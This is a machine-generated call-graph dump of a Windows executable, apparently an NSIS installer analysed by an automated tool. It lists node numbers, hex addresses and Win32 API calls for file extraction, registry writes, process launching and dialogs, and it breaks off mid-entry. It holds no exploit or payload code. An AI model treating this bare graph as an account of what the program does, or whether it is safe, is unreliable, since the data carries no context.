4003->4004 4005 4026fe 4003->4005 4007 402f1f 46 API calls 4004->4007 4006 402f1f 46 API calls 4005->4006 4010 40270b 4006->4010 4008 402757 4007->4008 4008->3998 4009 402729 GlobalFree 4009->4004 4010->4009 4011->3993 4012->4001 4013 406604 4017 40613c 4013->4017 4014 406aa7 4015 4061c6 GlobalAlloc 4015->4014 4015->4017 4016 4061bd GlobalFree 4016->4015 4017->4014 4017->4015 4017->4016 4017->4017 4018 406234 GlobalFree 4017->4018 4019 40623d GlobalAlloc 4017->4019 4018->4019 4019->4014 4019->4017 4020 401705 4021 4029fd 18 API calls 4020->4021 4022 40170c SearchPathA 4021->4022 4023 401727 4022->4023 3051 405107 3052 4052b4 3051->3052 3053 405129 GetDlgItem GetDlgItem GetDlgItem 3051->3053 3054 4052e4 3052->3054 3055 4052bc GetDlgItem CreateThread FindCloseChangeNotification 3052->3055 3096 404001 SendMessageA 3053->3096 3057 405312 3054->3057 3059 405333 3054->3059 3060 4052fa ShowWindow ShowWindow 3054->3060 3055->3054 3119 40509b OleInitialize 3055->3119 3061 40536d 3057->3061 3064 405322 3057->3064 3065 405346 ShowWindow 3057->3065 3058 40519a 3062 4051a1 GetClientRect GetSystemMetrics SendMessageA SendMessageA 3058->3062 3105 404033 3059->3105 3101 404001 SendMessageA 3060->3101 3061->3059 3069 40537a SendMessageA 3061->3069 3067 405210 3062->3067 3068 4051f4 SendMessageA SendMessageA 3062->3068 3102 403fa5 3064->3102 3072 405366 3065->3072 3073 405358 3065->3073 3075 405223 3067->3075 3076 405215 SendMessageA 3067->3076 3068->3067 3071 40533f 3069->3071 3077 405393 CreatePopupMenu 3069->3077 3074 403fa5 SendMessageA 3072->3074 3078 404fc9 25 API calls 3073->3078 3074->3061 3097 403fcc 3075->3097 3076->3075 3079 405d00 18 API calls 3077->3079 3078->3072 3081 4053a3 AppendMenuA 3079->3081 3083 4053c1 GetWindowRect 3081->3083 3084 4053d4 TrackPopupMenu 3081->3084 3082 405233 3085 405270 GetDlgItem SendMessageA 3082->3085 3086 40523c ShowWindow 3082->3086 3083->3084 3084->3071 3087 4053f0 3084->3087 3085->3071 3090 405297 SendMessageA SendMessageA 3085->3090 3088 405252 ShowWindow 3086->3088 3089 40525f 3086->3089 3091 40540f SendMessageA 3087->3091 3088->3089 3100 404001 SendMessageA 3089->3100 3090->3071 3091->3091 3092 40542c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3091->3092 3094 40544e SendMessageA 3092->3094 3094->3094 3095 405470 GlobalUnlock SetClipboardData CloseClipboard 3094->3095 3095->3071 3096->3058 3098 405d00 18 API calls 3097->3098 3099 403fd7 SetDlgItemTextA 3098->3099 3099->3082 3100->3085 3101->3057 3103 403fb2 SendMessageA 3102->3103 3104 403fac 3102->3104 3103->3059 3104->3103 3106 40404b GetWindowLongA 3105->3106 3116 4040d4 3105->3116 3107 40405c 3106->3107 3106->3116 3108 40406b GetSysColor 3107->3108 3109 40406e 3107->3109 3108->3109 3110 404074 SetTextColor 3109->3110 3111 40407e SetBkMode 3109->3111 3110->3111 3112 404096 GetSysColor 3111->3112 3113 40409c 3111->3113 3112->3113 3114 4040a3 SetBkColor 3113->3114 3115 4040ad 3113->3115 3114->3115 3115->3116 3117 4040c0 DeleteObject 3115->3117 3118 4040c7 CreateBrushIndirect 3115->3118 3116->3071 3117->3118 3118->3116 3126 404018 3119->3126 3121 4050be 3125 4050e5 3121->3125 3129 401389 3121->3129 3122 404018 SendMessageA 3123 4050f7 OleUninitialize 3122->3123 3125->3122 3127 404030 3126->3127 3128 404021 SendMessageA 3126->3128 3127->3121 3128->3127 3131 401390 3129->3131 3130 4013fe 3130->3121 3131->3130 3132 4013cb MulDiv SendMessageA 3131->3132 3132->3131 4024 40440a 4025 404436 4024->4025 4026 404447 4024->4026 4085 4054d6 GetDlgItemTextA 4025->4085 4028 404453 GetDlgItem 4026->4028 4031 4044b2 4026->4031 4030 404467 4028->4030 4029 404441 4033 405f49 5 API calls 4029->4033 4034 40447b SetWindowTextA 4030->4034 4040 405807 4 API calls 4030->4040 4032 404596 4031->4032 4037 405d00 18 API calls 4031->4037 4083 404731 4031->4083 4032->4083 4087 4054d6 GetDlgItemTextA 4032->4087 4033->4026 4036 403fcc 19 API calls 4034->4036 4041 404497 4036->4041 4042 404526 SHBrowseForFolderA 4037->4042 4038 4045c6 4043 40585c 18 API calls 4038->4043 4039 404033 8 API calls 4044 404745 4039->4044 4048 404471 4040->4048 4045 403fcc 19 API calls 4041->4045 4042->4032 4046 40453e CoTaskMemFree 4042->4046 4047 4045cc 4043->4047 4049 4044a5 4045->4049 4050 40576e 3 API calls 4046->4050 4088 405cde lstrcpynA 4047->4088 4048->4034 4051 40576e 3 API calls 4048->4051 4086 404001 SendMessageA 4049->4086 4053 40454b 4050->4053 4051->4034 4056 404582 SetDlgItemTextA 4053->4056 4060 405d00 18 API calls 4053->4060 4055 4044ab 4058 406009 3 API calls 4055->4058 4056->4032 4057 4045e3 4059 406009 3 API calls 4057->4059 4058->4031 4067 4045eb 4059->4067 4061 40456a lstrcmpiA 4060->4061 4061->4056 4064 40457b lstrcatA 4061->4064 4062 404625 4089 405cde lstrcpynA 4062->4089 4064->4056 4065 40462c 4066 405807 4 API calls 4065->4066 4068 404632 GetDiskFreeSpaceA 4066->4068 4067->4062 4070 4057b5 2 API calls 4067->4070 4072 404676 4067->4072 4071 404654 MulDiv 4068->4071 4068->4072 4070->4067 4071->4072 4073 4046e0 4072->4073 4074 4047b2 21 API calls 4072->4074 4075 404703 4073->4075 4077 40140b 2 API calls 4073->4077 4076 4046d2 4074->4076 4090 403fee KiUserCallbackDispatcher 4075->4090 4079 4046e2 SetDlgItemTextA 4076->4079 4080 4046d7 4076->4080 4077->4075 4079->4073 4082 4047b2 21 API calls 4080->4082 4081 40471f 4081->4083 4091 40439f 4081->4091 4082->4073 4083->4039 4085->4029 4086->4055 4087->4038 4088->4057 4089->4065 4090->4081 4092 4043b2 SendMessageA 4091->4092 4093 4043ad 4091->4093 4092->4083 4093->4092 4094 40280a 4095 4029e0 18 API calls 4094->4095 4096 402810 4095->4096 4097 402841 4096->4097 4098 402663 4096->4098 4100 40281e 4096->4100 4097->4098 4099 405d00 18 API calls 4097->4099 4099->4098 4100->4098 4102 405c3c wsprintfA 4100->4102 4102->4098 4103 40218a 4104 4029fd 18 API calls 4103->4104 4105 402190 4104->4105 4106 4029fd 18 API calls 4105->4106 4107 402199 4106->4107 4108 4029fd 18 API calls 4107->4108 4109 4021a2 4108->4109 4110 405fe2 2 API calls 4109->4110 4111 4021ab 4110->4111 4112 4021bc lstrlenA lstrlenA 4111->4112 4117 4021af 4111->4117 4113 404fc9 25 API calls 4112->4113 4115 4021f8 SHFileOperationA 4113->4115 4114 404fc9 25 API calls 4116 4021b7 4114->4116 4115->4116 4115->4117 4117->4114 4117->4116 4118 40220c 4119 402213 4118->4119 4122 402226 4118->4122 4120 405d00 18 API calls 4119->4120 4121 402220 4120->4121 4123 4054f2 MessageBoxIndirectA 4121->4123 4123->4122 4124 401490 4125 404fc9 25 API calls 4124->4125 4126 401497 4125->4126 4127 401b11 4128 401b62 4127->4128 4129 401b1e 4127->4129 4130 401b66 4128->4130 4131 401b8b GlobalAlloc 4128->4131 4132 401ba6 4129->4132 4137 401b35 4129->4137 4145 402226 4130->4145 4148 405cde lstrcpynA 4130->4148 4134 405d00 18 API calls 4131->4134 4133 405d00 18 API calls 4132->4133 4132->4145 4135 402220 4133->4135 4134->4132 4141 4054f2 MessageBoxIndirectA 4135->4141 4146 405cde lstrcpynA 4137->4146 4138 401b78 GlobalFree 4138->4145 4140 401b44 4147 405cde lstrcpynA 4140->4147 4141->4145 4143 401b53 4149 405cde lstrcpynA 4143->4149 4146->4140 4147->4143 4148->4138 4149->4145 3047 401595 3048 4029fd 18 API calls 3047->3048 3049 40159c SetFileAttributesA 3048->3049 3050 4015ae 3049->3050 4150 404115 4151 40412b 4150->4151 4156 404237 4150->4156 4154 403fcc 19 API calls 4151->4154 4152 4042a6 4153 40437a 4152->4153 4155 4042b0 GetDlgItem 4152->4155 4161 404033 8 API calls 4153->4161 4157 404181 4154->4157 4158 4042c6 4155->4158 4159 404338 4155->4159 4156->4152 4156->4153 4160 40427b GetDlgItem SendMessageA 4156->4160 4162 403fcc 19 API calls 4157->4162 4158->4159 4163 4042ec 6 API calls 4158->4163 4159->4153 4164 40434a 4159->4164 4181 403fee KiUserCallbackDispatcher 4160->4181 4166 404375 4161->4166 4167 40418e CheckDlgButton 4162->4167 4163->4159 4168 404350 SendMessageA 4164->4168 4169 404361 4164->4169 4179 403fee KiUserCallbackDispatcher 4167->4179 4168->4169 4169->4166 4173 404367 SendMessageA 4169->4173 4170 4042a1 4174 40439f SendMessageA 4170->4174 4172 4041ac GetDlgItem 4180 404001 SendMessageA 4172->4180 4173->4166 4174->4152 4176 4041c2 SendMessageA 4177 4041e0 GetSysColor 4176->4177 4178 4041e9 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4176->4178 4177->4178 4178->4166 4179->4172 4180->4176 4181->4170 4182 401c95 4183 4029e0 18 API calls 4182->4183 4184 401c9c 4183->4184 4185 4029e0 18 API calls 4184->4185 4186 401ca4 GetDlgItem 4185->4186 4187 4024cb 4186->4187 3133 403217 #17 SetErrorMode OleInitialize 3134 406009 3 API calls 3133->3134 3135 40325c SHGetFileInfoA 3134->3135 3206 405cde lstrcpynA 3135->3206 3137 403287 GetCommandLineA 3207 405cde lstrcpynA 3137->3207 3139 403299 GetModuleHandleA 3140 4032b0 3139->3140 3141 405799 CharNextA 3140->3141 3142 4032c4 CharNextA 3141->3142 3147 4032d4 3142->3147 3143 40339e 3144 4033b1 GetTempPathA 3143->3144 3208 4031e3 3144->3208 3146 4033c9 3148 403423 DeleteFileA 3146->3148 3149 4033cd GetWindowsDirectoryA lstrcatA 3146->3149 3147->3143 3150 405799 CharNextA 3147->3150 3154 4033a0 3147->3154 3216 402c79 GetTickCount GetModuleFileNameA 3148->3216 3151 4031e3 11 API calls 3149->3151 3150->3147 3153 4033e9 3151->3153 3153->3148 3157 4033ed GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3153->3157 3300 405cde lstrcpynA 3154->3300 3155 403437 3158 4034cd 3155->3158 3161 4034bd 3155->3161 3162 405799 CharNextA 3155->3162 3160 4031e3 11 API calls 3157->3160 3317 403675 3158->3317 3164 40341b 3160->3164 3246 403767 3161->3246 3166 403452 3162->3166 3164->3148 3164->3158 3173 403498 3166->3173 3174 4034fc lstrcatA lstrcmpiA 3166->3174 3167 4034e6 3326 4054f2 3167->3326 3168 4035da 3170 40365d ExitProcess 3168->3170 3171 406009 3 API calls 3168->3171 3176 4035e9 3171->3176 3301 40585c 3173->3301 3174->3158 3178 403518 CreateDirectoryA SetCurrentDirectoryA 3174->3178 3179 406009 3 API calls 3176->3179 3181 40353a 3178->3181 3182 40352f 3178->3182 3183 4035f2 3179->3183 3331 405cde lstrcpynA 3181->3331 3330 405cde lstrcpynA 3182->3330 3186 406009 3 API calls 3183->3186 3188 4035fb 3186->3188 3190 403649 ExitWindowsEx 3188->3190 3197 403609 GetCurrentProcess 3188->3197 3189 4034b2 3316 405cde lstrcpynA 3189->3316 3190->3170 3193 403656 3190->3193 3192 405d00 18 API calls 3194 403579 DeleteFileA 3192->3194 3337 40140b 3193->3337 3196 403586 CopyFileA 3194->3196 3203 403548 3194->3203 3196->3203 3200 403619 3197->3200 3198 4035ce 3201 405b92 40 API calls 3198->3201 3200->3190 3201->3158 3202 405d00 18 API calls 3202->3203 3203->3192 3203->3198 3203->3202 3204 405491 2 API calls 3203->3204 3205 4035ba CloseHandle 3203->3205 3332 405b92 3203->3332 3204->3203 3205->3203 3206->3137 3207->3139 3209 405f49 5 API calls 3208->3209 3210 4031ef 3209->3210 3211 4031f9 3210->3211 3340 40576e lstrlenA CharPrevA 3210->3340 3211->3146 3347 40596f GetFileAttributesA CreateFileA 3216->3347 3218 402cbc 3245 402cc9 3218->3245 3348 405cde lstrcpynA 3218->3348 3220 402cdf 3349 4057b5 lstrlenA 3220->3349 3224 402cf0 GetFileSize 3225 402df1 3224->3225 3243 402d07 3224->3243 3354 402bda 3225->3354 3229 402e8c 3232 402bda 33 API calls 3229->3232 3230 402e34 GlobalAlloc 3231 402e4b 3230->3231 3235 40599e 2 API calls 3231->3235 3232->3245 3234 402e15 3236 4031b6 ReadFile 3234->3236 3238 402e5c CreateFileA 3235->3238 3239 402e20 3236->3239 3237 402bda 33 API calls 3237->3243 3240 402e96 3238->3240 3238->3245 3239->3230 3239->3245 3369 4031cc SetFilePointer 3240->3369 3242 402ea4 3370 402f1f 3242->3370 3243->3225 3243->3229 3243->3237 3243->3245 3385 4031b6 3243->3385 3245->3155 3247 406009 3 API calls 3246->3247 3248 40377b 3247->3248 3249 403781 3248->3249 3250 403793 3248->3250 3424 405c3c wsprintfA 3249->3424 3251 405bc5 3 API calls 3250->3251 3252 4037be 3251->3252 3253 4037dc lstrcatA 3252->3253 3255 405bc5 3 API calls 3252->3255 3256 403791 3253->3256 3255->3253 3415 403a2c 3256->3415 3259 40585c 18 API calls 3260 40380e 3259->3260 3261 403897 3260->3261 3263 405bc5 3 API calls 3260->3263 3262 40585c 18 API calls 3261->3262 3264 40389d 3262->3264 3266 40383a 3263->3266 3265 4038ad LoadImageA 3264->3265 3267 405d00 18 API calls 3264->3267 3268 403953 3265->3268 3269 4038d4 RegisterClassA 3265->3269 3266->3261 3270 403856 lstrlenA 3266->3270 3274 405799 CharNextA 3266->3274 3267->3265 3273 40140b 2 API calls 3268->3273 3271 40395d 3269->3271 3272 40390a SystemParametersInfoA CreateWindowExA 3269->3272 3275 403864 lstrcmpiA 3270->3275 3276 40388a 3270->3276 3271->3158 3272->3268 3277 403959 3273->3277 3278 403854 3274->3278 3275->3276 3279 403874 GetFileAttributesA 3275->3279 3280 40576e 3 API calls 3276->3280 3277->3271 3282 403a2c 19 API calls 3277->3282 3278->3270 3281 403880 3279->3281 3283 403890 3280->3283 3281->3276 3284 4057b5 2 API calls 3281->3284 3285 40396a 3282->3285 3425 405cde lstrcpynA 3283->3425 3284->3276 3287 403976 ShowWindow LoadLibraryA 3285->3287 3288 4039f9 3285->3288 3290 403995 LoadLibraryA 3287->3290 3291 40399c GetClassInfoA 3287->3291 3289 40509b 5 API calls 3288->3289 3292 4039ff 3289->3292 3290->3291 3293 4039b0 GetClassInfoA RegisterClassA 3291->3293 3294 4039c6 DialogBoxParamA 3291->3294 3296 403a1b 3292->3296 3297 403a03 3292->3297 3293->3294 3295 40140b 2 API calls 3294->3295 3295->3271 3298 40140b 2 API calls 3296->3298 3297->3271 3299 40140b 2 API calls 3297->3299 3298->3271 3299->3271 3300->3144 3427 405cde lstrcpynA 3301->3427 3303 40586d 3304 405807 4 API calls 3303->3304 3305 405873 3304->3305 3306 4034a3 3305->3306 3307 405f49 5 API calls 3305->3307 3306->3158 3315 405cde lstrcpynA 3306->3315 3310 405883 3307->3310 3308 4058ae lstrlenA 3309 4058b9 3308->3309 3308->3310 3312 40576e 3 API calls 3309->3312 3310->3306 3310->3308 3314 4057b5 2 API calls 3310->3314 3428 405fe2 FindFirstFileA 3310->3428 3313 4058be GetFileAttributesA 3312->3313 3313->3306 3314->3308 3315->3189 3316->3161 3318 403690 3317->3318 3319 403686 CloseHandle 3317->3319 3320 4036a4 3318->3320 3321 40369a CloseHandle 3318->3321 3319->3318 3431 4036d2 3320->3431 3321->3320 3327 405507 3326->3327 3328 4034f4 ExitProcess 3327->3328 3329 40551b MessageBoxIndirectA 3327->3329 3329->3328 3330->3181 3331->3203 3333 406009 3 API calls 3332->3333 3336 405b99 3333->3336 3335 405bba 3335->3203 3336->3335 3485 405a16 lstrcpyA 3336->3485 3338 401389 2 API calls 3337->3338 3339 401420 3338->3339 3339->3170 3341 403201 CreateDirectoryA 3340->3341 3342 405788 lstrcatA 3340->3342 3343 40599e 3341->3343 3342->3341 3344 4059a9 GetTickCount GetTempFileNameA 3343->3344 3345 4059d6 3344->3345 3346 403215 3344->3346 3345->3344 3345->3346 3346->3146 3347->3218 3348->3220 3350 4057c2 3349->3350 3351 402ce5 3350->3351 3352 4057c7 CharPrevA 3350->3352 3353 405cde lstrcpynA 3351->3353 3352->3350 3352->3351 3353->3224 3355 402c00 3354->3355 3356 402be8 3354->3356 3359 402c10 GetTickCount 3355->3359 3360 402c08 3355->3360 3357 402bf1 DestroyWindow 3356->3357 3358 402bf8 3356->3358 3357->3358 3358->3230 3358->3245 3388 4031cc SetFilePointer 3358->3388 3359->3358 3362 402c1e 3359->3362 3361 406042 2 API calls 3360->3361 3361->3358 3363 402c53 CreateDialogParamA ShowWindow 3362->3363 3364 402c26 3362->3364 3363->3358 3364->3358 3389 402bbe 3364->3389 3366 402c34 wsprintfA 3367 404fc9 25 API calls 3366->3367 3368 402c51 3367->3368 3368->3358 3369->3242 3371 402f4b 3370->3371 3372 402f2f SetFilePointer 3370->3372 3392 40303a GetTickCount 3371->3392 3372->3371 3377 40303a 43 API calls 3378 402f82 3377->3378 3379 402f92 3378->3379 3380 402ffc ReadFile 3378->3380 3384 402ff6 3378->3384 3382 4059e7 ReadFile 3379->3382 3383 402fc5 WriteFile 3379->3383 3379->3384 3380->3384 3382->3379 3383->3379 3383->3384 3384->3245 3386 4059e7 ReadFile 3385->3386 3387 4031c9 3386->3387 3387->3243 3388->3234 3390 402bcd 3389->3390 3391 402bcf MulDiv 3389->3391 3390->3391 3391->3366 3393 4031a4 3392->3393 3394 403069 3392->3394 3395 402bda 33 API calls 3393->3395 3407 4031cc SetFilePointer 3394->3407 3402 402f52 3395->3402 3397 403074 SetFilePointer 3401 403099 3397->3401 3398 4031b6 ReadFile 3398->3401 3400 402bda 33 API calls 3400->3401 3401->3398 3401->3400 3401->3402 3403 40312e WriteFile 3401->3403 3404 403185 SetFilePointer 3401->3404 3408 406109 3401->3408 3402->3384 3405 4059e7 ReadFile 3402->3405 3403->3401 3403->3402 3404->3393 3406 402f6b 3405->3406 3406->3377 3406->3384 3407->3397 3409 40612e 3408->3409 3412 406136 3408->3412 3409->3401 3410 4061c6 GlobalAlloc 3410->3409 3410->3412 3411 4061bd GlobalFree 3411->3410 3412->3409 3412->3410 3412->3411 3413 406234 GlobalFree 3412->3413 3414 40623d GlobalAlloc 3412->3414 3413->3414 3414->3409 3414->3412 3416 403a40 3415->3416 3426 405c3c wsprintfA 3416->3426 3418 403ab1 3419 405d00 18 API calls 3418->3419 3420 403abd SetWindowTextA 3419->3420 3421 4037ec 3420->3421 3422 403ad9 3420->3422 3421->3259 3422->3421 3423 405d00 18 API calls 3422->3423 3423->3422 3424->3256 3425->3261 3426->3418 3427->3303 3429 406003 3428->3429 3430 405ff8 FindClose 3428->3430 3429->3310 3430->3429 3432 4036e0 3431->3432 3433 4036a9 3432->3433 3434 4036e5 FreeLibrary GlobalFree 3432->3434 3435 40559e 3433->3435 3434->3433 3434->3434 3436 40585c 18 API calls 3435->3436 3437 4055be 3436->3437 3438 4055c6 DeleteFileA 3437->3438 3439 4055dd 3437->3439 3467 4034d6 OleUninitialize 3438->3467 3442 40570b 3439->3442 3472 405cde lstrcpynA 3439->3472 3441 405603 3443 405616 3441->3443 3444 405609 lstrcatA 3441->3444 3447 405fe2 2 API calls 3442->3447 3442->3467 3446 4057b5 2 API calls 3443->3446 3445 40561c 3444->3445 3448 40562a lstrcatA 3445->3448 3450 405635 lstrlenA FindFirstFileA 3445->3450 3446->3445 3449 40572f 3447->3449 3448->3450 3451 40576e 3 API calls 3449->3451 3449->3467 3450->3442 3470 405659 3450->3470 3453 405739 3451->3453 3452 405799 CharNextA 3452->3470 3454 405556 5 API calls 3453->3454 3455 405745 3454->3455 3456 405749 3455->3456 3457 40575f 3455->3457 3461 404fc9 25 API calls 3456->3461 3456->3467 3459 404fc9 25 API calls 3457->3459 3459->3467 3460 4056ea FindNextFileA 3462 405702 FindClose 3460->3462 3460->3470 3463 405756 3461->3463 3462->3442 3464 405b92 40 API calls 3463->3464 3464->3467 3466 40559e 64 API calls 3466->3470 3467->3167 3467->3168 3468 404fc9 25 API calls 3468->3460 3469 404fc9 25 API calls 3469->3470 3470->3452 3470->3460 3470->3466 3470->3468 3470->3469 3471 405b92 40 API calls 3470->3471 3473 405cde lstrcpynA 3470->3473 3474 405556 3470->3474 3471->3470 3472->3441 3473->3470 3482 40594a GetFileAttributesA 3474->3482 3477 405583 3477->3470 3478 405571 RemoveDirectoryA 3480 40557f 3478->3480 3479 405579 DeleteFileA 3479->3480 3480->3477 3481 40558f SetFileAttributesA 3480->3481 3481->3477 3483 405562 3482->3483 3484 40595c SetFileAttributesA 3482->3484 3483->3477 3483->3478 3483->3479 3484->3483 3486 405a65 GetShortPathNameA 3485->3486 3487 405a3f 3485->3487 3489 405a7a 3486->3489 3490 405b8c 3486->3490 3510 40596f GetFileAttributesA CreateFileA 3487->3510 3489->3490 3492 405a82 wsprintfA 3489->3492 3490->3335 3491 405a49 CloseHandle GetShortPathNameA 3491->3490 3493 405a5d 3491->3493 3494 405d00 18 API calls 3492->3494 3493->3486 3493->3490 3495 405aaa 3494->3495 3511 40596f GetFileAttributesA CreateFileA 3495->3511 3497 405ab7 3497->3490 3498 405ac6 GetFileSize GlobalAlloc 3497->3498 3499 405b85 CloseHandle 3498->3499 3500 405ae8 3498->3500 3499->3490 3501 4059e7 ReadFile 3500->3501 3502 405af0 3501->3502 3502->3499 3512 4058d4 lstrlenA 3502->3512 3505 405b07 lstrcpyA 3508 405b29 3505->3508 3506 405b1b 3507 4058d4 4 API calls 3506->3507 3507->3508 3509 405b60 SetFilePointer WriteFile GlobalFree 3508->3509 3509->3499 3510->3491 3511->3497 3513 405915 lstrlenA 3512->3513 3514 4058ee lstrcmpiA 3513->3514 3515 40591d 3513->3515 3514->3515 3516 40590c CharNextA 3514->3516 3515->3505 3515->3506 3516->3513 4194 402519 4195 4029e0 18 API calls 4194->4195 4200 402523 4195->4200 4196 40258d 4197 4059e7 ReadFile 4197->4200 4198 40258f 4203 405c3c wsprintfA 4198->4203 4200->4196 4200->4197 4200->4198 4201 40259f 4200->4201 4201->4196 4202 4025b5 SetFilePointer 4201->4202 4202->4196 4203->4196 3615 40231c 3616 402322 3615->3616 3617 4029fd 18 API calls 3616->3617 3618 402334 3617->3618 3619 4029fd 18 API calls 3618->3619 3620 40233e RegCreateKeyExA 3619->3620 3621 402892 3620->3621 3622 402368 3620->3622 3623 402380 3622->3623 3624 4029fd 18 API calls 3622->3624 3625 40238c 3623->3625 3628 4029e0 18 API calls 3623->3628 3627 402379 lstrlenA 3624->3627 3626 4023a7 RegSetValueExA 3625->3626 3629 402f1f 46 API calls 3625->3629 3630 4023bd RegCloseKey 3626->3630 3627->3623 3628->3625 3629->3626 3630->3621 4204 40261c 4205 40261f 4204->4205 4209 402637 4204->4209 4206 40262c FindNextFileA 4205->4206 4207 402676 4206->4207 4206->4209 4210 405cde lstrcpynA 4207->4210 4210->4209 4218 4016a1 4219 4029fd 18 API calls 4218->4219 4220 4016a7 GetFullPathNameA 4219->4220 4221 4016be 4220->4221 4227 4016df 4220->4227 4224 405fe2 2 API calls 4221->4224 4221->4227 4222 402892 4223 4016f3 GetShortPathNameA 4223->4222 4225 4016cf 4224->4225 4225->4227 4228 405cde lstrcpynA 4225->4228 4227->4222 4227->4223 4228->4227 4229 403725 4230 403730 4229->4230 4231 403737 GlobalAlloc 4230->4231 4232 403734 4230->4232 4231->4232 4233 401d26 GetDC GetDeviceCaps 4234 4029e0 18 API calls 4233->4234 4235 401d44 MulDiv ReleaseDC 4234->4235 4236 4029e0 18 API calls 4235->4236 4237 401d63 4236->4237 4238 405d00 18 API calls 4237->4238 4239 401d9c CreateFontIndirectA 4238->4239 4240 4024cb 4239->4240 4248 40172c 4249 4029fd 18 API calls 4248->4249 4250 401733 4249->4250 4251 40599e 2 API calls 4250->4251 4252 40173a 4251->4252 4252->4252 4253 401dac 4254 4029e0 18 API calls 4253->4254 4255 401db2 4254->4255 4256 4029e0 18 API calls 4255->4256 4257 401dbb 4256->4257 4258 401dc2 ShowWindow 4257->4258 4259 401dcd EnableWindow 4257->4259 4260 402892 4258->4260 4259->4260 4261 401eac 4262 4029fd 18 API calls 4261->4262 4263 401eb3 4262->4263 4264 405fe2 2 API calls 4263->4264 4265 401eb9 4264->4265 4267 401ecb 4265->4267 4268 405c3c wsprintfA 4265->4268 4268->4267 4269 40192d 4270 4029fd 18 API calls 4269->4270 4271 401934 lstrlenA 4270->4271 4272 4024cb 4271->4272 4273 4024af 4274 4029fd 18 API calls 4273->4274 4275 4024b6 4274->4275 4278 40596f GetFileAttributesA CreateFileA 4275->4278 4277 4024c2 4278->4277 4279 401cb0 4280 4029e0 18 API calls 4279->4280 4281 401cc0 SetWindowLongA 4280->4281 4282 402892 4281->4282 4283 401a31 4284 4029e0 18 API calls 4283->4284 4285 401a37 4284->4285 4286 4029e0 18 API calls 4285->4286 4287 4019e1 4286->4287 2984 401e32 2985 4029fd 18 API calls 2984->2985 2986 401e38 2985->2986 3000 404fc9 2986->3000 2990 401e9e CloseHandle 2992 402663 2990->2992 2991 401e67 WaitForSingleObject 2993 401e48 2991->2993 2994 401e75 GetExitCodeProcess 2991->2994 2993->2990 2993->2991 2993->2992 3014 406042 2993->3014 2995 401e92 2994->2995 2996 401e87 2994->2996 2995->2990 2999 401e90 2995->2999 3018 405c3c wsprintfA 2996->3018 2999->2990 3001 404fe4 3000->3001 3010 401e42 3000->3010 3002 405001 lstrlenA 3001->3002 3003 405d00 18 API calls 3001->3003 3004 40502a 3002->3004 3005 40500f lstrlenA 3002->3005 3003->3002 3007 405030 SetWindowTextA 3004->3007 3008 40503d 3004->3008 3006 405021 lstrcatA 3005->3006 3005->3010 3006->3004 3007->3008 3009 405043 SendMessageA SendMessageA SendMessageA 3008->3009 3008->3010 3009->3010 3011 405491 CreateProcessA 3010->3011 3012 4054c0 CloseHandle 3011->3012 3013 4054cc 3011->3013 3012->3013 3013->2993 3015 40605f PeekMessageA 3014->3015 3016 406055 DispatchMessageA 3015->3016 3017 40606f 3015->3017 3016->3015 3017->2991 3018->2999 3019 4015b3 3020 4029fd 18 API calls 3019->3020 3021 4015ba 3020->3021 3037 405807 CharNextA CharNextA 3021->3037 3023 40160a 3024 401638 3023->3024 3025 40160f 3023->3025 3031 401423 25 API calls 3024->3031 3043 401423 3025->3043 3026 405799 CharNextA 3028 4015d0 CreateDirectoryA 3026->3028 3029 4015c2 3028->3029 3030 4015e5 GetLastError 3028->3030 3029->3023 3029->3026 3030->3029 3033 4015f2 GetFileAttributesA 3030->3033 3036 401630 3031->3036 3033->3029 3035 401621 SetCurrentDirectoryA 3035->3036 3038 405822 3037->3038 3042 405832 3037->3042 3039 40582d CharNextA 3038->3039 3038->3042 3040 405852 3039->3040 3040->3029 3041 405799 CharNextA 3041->3042 3042->3040 3042->3041 3044 404fc9 25 API calls 3043->3044 3045 401431 3044->3045 3046 405cde lstrcpynA 3045->3046 3046->3035 4288 402036 4289 4029fd 18 API calls 4288->4289 4290 40203d 4289->4290 4291 4029fd 18 API calls 4290->4291 4292 402047 4291->4292 4293 4029fd 18 API calls 4292->4293 4294 402051 4293->4294 4295 4029fd 18 API calls 4294->4295 4296 40205b 4295->4296 4297 4029fd 18 API calls 4296->4297 4298 402064 4297->4298 4299 40207a CoCreateInstance 4298->4299 4300 4029fd 18 API calls 4298->4300 4301 40214d 4299->4301 4304 402099 4299->4304 4300->4299 4302 401423 25 API calls 4301->4302 4303 402181 4301->4303 4302->4303 4304->4301 4305 40212f MultiByteToWideChar 4304->4305 4305->4301 4306 4014b7 4307 4014bd 4306->4307 4308 401389 2 API calls 4307->4308 4309 4014c5 4308->4309 3517 401bb8 3539 4029e0 3517->3539 3519 401bbf 3520 4029e0 18 API calls 3519->3520 3521 401bc9 3520->3521 3522 401bd9 3521->3522 3523 4029fd 18 API calls 3521->3523 3524 401be9 3522->3524 3525 4029fd 18 API calls 3522->3525 3523->3522 3526 401bf4 3524->3526 3527 401c38 3524->3527 3525->3524 3529 4029e0 18 API calls 3526->3529 3528 4029fd 18 API calls 3527->3528 3530 401c3d 3528->3530 3531 401bf9 3529->3531 3532 4029fd 18 API calls 3530->3532 3533 4029e0 18 API calls 3531->3533 3534 401c46 FindWindowExA 3532->3534 3535 401c02 3533->3535 3538 401c64 3534->3538 3536 401c28 SendMessageA 3535->3536 3537 401c0a SendMessageTimeoutA 3535->3537 3536->3538 3537->3538 3540 405d00 18 API calls 3539->3540 3541 4029f4 3540->3541 3541->3519 4310 4062b8 4314 40613c 4310->4314 4311 406aa7 4312 4061c6 GlobalAlloc 4312->4311 4312->4314 4313 4061bd GlobalFree 4313->4312 4314->4311 4314->4312 4314->4313 4315 406234 GlobalFree 4314->4315 4316 40623d GlobalAlloc 4314->4316 4315->4316 4316->4311 4316->4314 4317 40243a 4318 402b07 19 API calls 4317->4318 4319 402444 4318->4319 4320 4029e0 18 API calls 4319->4320 4321 40244d 4320->4321 4322 402663 4321->4322 4323 402470 RegEnumValueA 4321->4323 4324 402464 RegEnumKeyA 4321->4324 4323->4322 4325 402489 RegCloseKey 4323->4325 4324->4325 4325->4322 4327 40223b 4328 402243 4327->4328 4330 402249 4327->4330 4329 4029fd 18 API calls 4328->4329 4329->4330 4331 4029fd 18 API calls 4330->4331 4332 402259 4330->4332 4331->4332 4333 4029fd 18 API calls 4332->4333 4335 402267 4332->4335 4333->4335 4334 4029fd 18 API calls 4336 402270 WritePrivateProfileStringA 4334->4336 4335->4334 4337 404f3d 4338 404f61 4337->4338 4339 404f4d 4337->4339 4340 404f69 